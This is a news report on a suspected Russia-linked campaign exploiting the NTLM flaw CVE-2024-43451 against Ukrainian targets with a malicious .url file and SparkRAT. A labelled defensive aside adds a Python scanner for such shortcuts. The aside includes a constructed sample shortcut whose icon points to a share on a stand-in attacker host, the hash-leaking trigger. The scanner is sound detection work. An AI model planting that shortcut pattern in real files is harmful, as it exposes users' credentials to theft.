Russia-linked hackers exploit NTLM zero-day in cyberattack on Ukraine

A recently patched security flaw in Windows NT LAN Manager (NTLM) was weaponized by a suspected Russia-linked threat actor in a cyber campaign targeting Ukraine.

The vulnerability, tracked as CVE-2024-43451, was actively exploited as a zero-day, allowing attackers to steal sensitive information from targeted systems. CVE-2024-43451 is a spoofing vulnerability in the NTLM authentication protocol. The flaw lets an attacker obtain a remote user's NTLM hash with only minimal user interaction.

Microsoft fixed the issue in its November 2024 Patch Tuesday release, alongside another actively exploited vulnerability, CVE-2024-49039, an elevation of privilege flaw in Windows Task Scheduler. An attacker exploiting that flaw can elevate from a low-privileged AppContainer environment to Medium Integrity, gaining unauthorized access to resources and RPC (Remote Procedure Call) functions normally restricted to higher-privileged accounts.

According to ClearSky researchers, who discovered the flaw, the attack exploiting CVE-2024-43451 was launched with a targeted phishing email sent from a compromised Ukrainian government server and aimed at government personnel and academic institutions. The email, masquerading as a certificate renewal notice, contained a malicious URL file. Interacting with the file (right-clicking, deleting, or moving it) was enough to trigger the vulnerability, initiating a connection to an attacker-controlled server and delivering additional payloads, including the SparkRAT malware.
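As an added defender-side example (not code from the article or from ClearSky), a small Python scanner for Internet Shortcut (.url) attachments like the one described above: it parses the file and flags any field that points at a remote host. It assumes, since the page does not spell this out, that fields such as IconFile and WorkingDirectory can be resolved by the shell when the file is merely displayed or handled, so those are the references worth hunting for in mail attachments; the sample files and the attacker.invalid host are constructed.

```python
import re
UNC_RE = re.compile(r"^\\\\([^\\/]+)[\\/]")              # \\host\share\...
URL_RE = re.compile(r"^(https?|file|ftp)://([^/\\?#]*)", re.I)
LOCAL_HOSTS = {"", "localhost", "127.0.0.1", "::1"}

def parse_url_file(text: str) -> dict:
    """Parse the INI-like body of a .url file into {section: {key: value}}."""
    sections, current = {}, None
    for raw in text.lstrip("\ufeff").splitlines():  # tolerate a UTF-8 BOM
        line = raw.strip()
        if not line or line.startswith((";", "#")):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].strip().lower()
            sections.setdefault(current, {})
        elif "=" in line and current is not None:
            key, _, value = line.partition("=")
            sections[current][key.strip().lower()] = value.strip()
    return sections

def remote_host(value: str):
    """Return the host a field value would make the client contact, else None."""
    m = UNC_RE.match(value)
    if m:
        return m.group(1).lower()
    m = URL_RE.match(value)
    if m and m.group(2).lower() not in LOCAL_HOSTS:
        return m.group(2).lower()
    return None

def find_remote_refs(text: str) -> list:
    """Return [(field, host)] for shortcut fields that resolve off the local machine."""
    shortcut = parse_url_file(text).get("internetshortcut", {})
    findings = []
    # Assumption: IconFile/WorkingDirectory may be resolved on mere handling of the
    # file, so a remote reference there is the indicator worth hunting for.
    for field in ("iconfile", "workingdirectory", "url"):
        value = shortcut.get(field, "")
        if field == "url" and value.lower().startswith(("http://", "https://")):
            continue  # an ordinary web shortcut is only followed on launch
        host = remote_host(value)
        if host:
            findings.append((field, host))
    return findings

# Constructed samples (not from the report): a plain web shortcut and one whose
# icon is fetched from a share on a placeholder host.
BENIGN = "[InternetShortcut]\r\nURL=https://www.example.com/\r\nIconIndex=0\r\n"
SUSPECT = ("\ufeff[InternetShortcut]\r\nURL=https://www.example.com/renew\r\n"
           "IconFile=\\\\files.attacker.invalid\\share\\cert.ico\r\nIconIndex=1\r\n")
```

Running `find_remote_refs` over every .url file pulled from a mail gateway or user profile gives a quick triage list; hosts that are neither internal file servers nor known SaaS endpoints deserve a closer look.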

SparkRAT, an open-source remote access trojan, provides attackers with extensive control over compromised systems, enabling remote access, data exfiltration, and system manipulation. To maintain persistence, the attackers employed various techniques, allowing them to retain access even after system reboots, further complicating incident response efforts.

Ukraine's cybersecurity agency CERT-UA attributed the attack to the threat actor group it tracks as UAC-0194, which is believed to have ties to Russia. ClearSky also identified similarities between this campaign and previous attacks from other known Russian-affiliated actors, suggesting either shared resources or a common toolkit.
